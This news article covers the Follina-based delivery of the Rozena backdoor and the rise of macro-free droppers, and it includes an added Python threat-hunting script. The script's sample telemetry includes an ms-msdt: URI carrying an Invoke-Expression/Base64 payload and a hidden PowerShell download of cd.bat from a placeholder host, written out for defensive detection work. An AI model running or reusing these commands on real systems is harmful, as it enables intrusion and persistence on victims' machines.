Hackers exploited the Follina flaw to install Rozena backdoor



Phishing attacks are spreading a previously undocumented backdoor, Rozena, on Windows systems by exploiting the recently disclosed Follina security vulnerability.


According to a new report from Fortinet FortiGuard Labs researcher Cara Lin, "Rozena is a backdoor malware that can inject a remote shell connection back to the attacker's machine."


CVE-2022-30190, a remote code execution vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT), has been heavily exploited in the weeks since it was publicly disclosed in late May 2022.


As part of the latest attack chain, Fortinet found a weaponized Office document that connects to a Discord CDN URL and retrieves an HTML file ("index.htm"). That HTML file in turn runs a PowerShell command that launches the diagnostic tool (msdt.exe) and downloads the next-stage payloads from the same CDN attachment space.


Among those payloads, "Word.exe" is the Rozena implant, while "cd.bat" is a batch file that terminates MSDT processes and establishes the backdoor's persistence through a Windows Registry modification.


Rozena itself injects shellcode that launches a reverse shell to the attacker's host (microsofto.duckdns[.]org), letting the attacker take control of the system to monitor and capture information while keeping a backdoor into the compromised machine.
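
As an added example (not Fortinet's code or the article's own), the following Python hunts for the execution chain described above in Sysmon-style telemetry: an Office process spawning msdt.exe, an ms-msdt: URI carrying PowerShell in its IT_BrowseForFile parameter, sdiagnhost.exe spawning a shell, and a Run-key write pointing at a user-writable path for persistence. The field names, the Run key (the article does not say which registry location cd.bat modifies), the Base64 blob and every sample event are assumptions constructed for illustration.

```python
"""Hunt for the Follina (CVE-2022-30190) chain in Sysmon-style events.

Added example, not Fortinet's code. Field names follow Sysmon Event ID 1
(process create) and Event ID 13 (registry value set); the sample events
and the persistence key are constructed assumptions.
"""
from __future__ import annotations

import re

# Images in the chain: Office parent -> msdt.exe -> sdiagnhost.exe -> shell.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DIAG_IMAGES = {"msdt.exe", "sdiagnhost.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Follina smuggles PowerShell into the IT_BrowseForFile parameter of an ms-msdt: URI.
MSDT_URI_RE = re.compile(r"ms-msdt:", re.I)
BROWSE_RE = re.compile(r"IT_BrowseForFile\s*=", re.I)
PS_RE = re.compile(r"Invoke-Expression|\bIEX\b|FromBase64String", re.I)
# Autostart key checked for persistence (assumption: the article names no key).
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path (either separator)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_process(event: dict) -> list[str]:
    """Findings for one process-creation event."""
    findings: list[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image in DIAG_IMAGES and parent in OFFICE_APPS:
        findings.append("office-spawned-msdt")
    if MSDT_URI_RE.search(cmdline) and BROWSE_RE.search(cmdline):
        findings.append("msdt-uri-browseforfile")
        if PS_RE.search(cmdline):
            findings.append("embedded-powershell")
    if image in SHELLS and parent in DIAG_IMAGES:
        findings.append("msdt-spawned-shell")
    return findings


def classify_registry(event: dict) -> list[str]:
    """Findings for one registry value-set event."""
    findings: list[str] = []
    target = event.get("TargetObject", "")
    details = event.get("Details", "")
    if RUN_KEY_RE.search(target):
        findings.append("run-key-persistence")
        if USER_WRITABLE_RE.search(details):
            findings.append("run-key-user-writable-path")
    return findings


def hunt(events: list[dict]) -> dict[int, list[str]]:
    """Return {event index: findings} for every event that triggers a rule."""
    results: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        if ev.get("EventID") == 1:
            found = classify_process(ev)
        elif ev.get("EventID") == 13:
            found = classify_registry(ev)
        else:
            found = []
        if found:
            results[i] = found
    return results


# Constructed sample telemetry (not real captures); the Base64 blob is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": (r'"C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force '
                     r'/param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
                     r'IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('
                     r"'[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString("
                     r"[System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+"
                     r"'QUFBQQ=='+[char]34+'))'))))i/../../../../../../../../../../../../../../"
                     r'Windows/System32/mpsigstub.exe"')},
    {"EventID": 1,
     "ParentImage": r"C:\Windows\System32\sdiagnhost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoP -W Hidden -c "(New-Object Net.WebClient).DownloadFile(\'http://example.invalid/cd.bat\',\'cd.bat\')"'},
    # Legitimate troubleshooter launched from Settings: must not fire.
    {"EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": r"msdt.exe -id NetworkDiagnosticsWeb"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Word",
     "Details": r"C:\Users\victim\AppData\Local\Temp\Word.exe"},
]

if __name__ == "__main__":
    for idx, findings in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(findings)}")
```

The parent-process rule and the command-line rule are kept separate on purpose: msdt.exe is launched legitimately from Settings and from support tooling, so the third sample event stays silent, while a Word-spawned msdt.exe or an ms-msdt: URI carrying Invoke-Expression is worth an alert on its own even if the other signal is missing.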




Malicious Word documents exploiting the Follina flaw are one of several social engineering lures now used to distribute malware such as Emotet, QBot, IcedID, and Bumblebee; other campaigns deliver the payload to the victim's device via Windows shortcut (LNK) files and ISO images.


These droppers reportedly arrive by email either as a direct attachment, inside a password-protected ZIP archive, within an HTML file that extracts the dropper when opened, or behind a link to a download page.


Microsoft's decision around the same time to block macros by default is said to have forced threat actors to pivot to alternative methods such as HTML smuggling and LNK and ISO files, with the first such attacks appearing in early April.




Only a month ago, Cyble revealed the existence of a malware tool called Quantum that is sold on underground forums to cybercriminals and supports file formats such as .LNK and .ISO.


In other words, ransomware and other malware can be dropped onto Windows systems through phishing emails without relying on Office macros, such as those embedded in Word documents.


Microsoft, meanwhile, has temporarily rolled back its plan to block Office macros by default in files downloaded from the internet while it works to improve "usability."
